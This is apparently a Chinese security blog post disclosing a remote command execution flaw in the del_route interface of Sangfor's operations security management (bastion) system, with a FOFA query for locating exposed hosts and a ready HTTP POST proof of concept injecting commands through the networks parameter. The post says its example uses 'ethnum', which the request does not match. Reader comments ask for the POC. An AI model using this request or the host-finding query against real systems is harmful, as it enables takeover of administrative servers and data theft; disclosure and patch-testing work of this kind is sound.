深信服运维安全管理系统 del_route 远程命令执行漏洞


漏洞简介

深信服运维安全管理系统 del_route 接口存在远程命令执行漏洞。攻击者可通过构造恶意的请求,利用该漏洞在目标服务器上执行任意命令,从而可能导致服务器被完全控制、敏感数据泄露等严重后果。影响范围包括所有运行存在该漏洞版本的深信服运维安全管理系统的服务器。

影响版本

低于 3.0.12 20241106

fofa语法

body="/fort/login" && header="FORTSESSIONID"

漏洞分析

看下 com.sbr.fort.web.controller.system.netconfig.NetConfigController#del_route的实现逻辑

两个参数networks与netmasks被直接拼接在cmd中,然后调用ShellExecutor类的exe方法进行执行,未任何过滤或校验,从而造成命令执行漏洞(两个参数均存在命令执行漏洞)。

漏洞复现

POC

多个参数均存在命令注入漏洞,这里以ethnum为例

POST /fort/system;help/netConfig/del_route HTTP/1.1
Host: sangfor_osm.mrxn.net
Content-Type: application/x-www-form-urlencoded

ipv=4&flags=UG&gateways=1.1.1.1&networks=RCE_POC&netmasks=255.255.255.0

访问命令执行结果文件

成功得到命令执行结果


手机扫码阅读

深信服运维安全管理系统 Jwt 密钥硬编码

深信服运维安全管理系统 del_net 远程命令执行漏洞

评 论
avatar
xilaile
poc可以发下麻大佬
2 个月前 回复
avatar
Mrxn
@xilaile:poc?不是在文章里吗
2 个月前 回复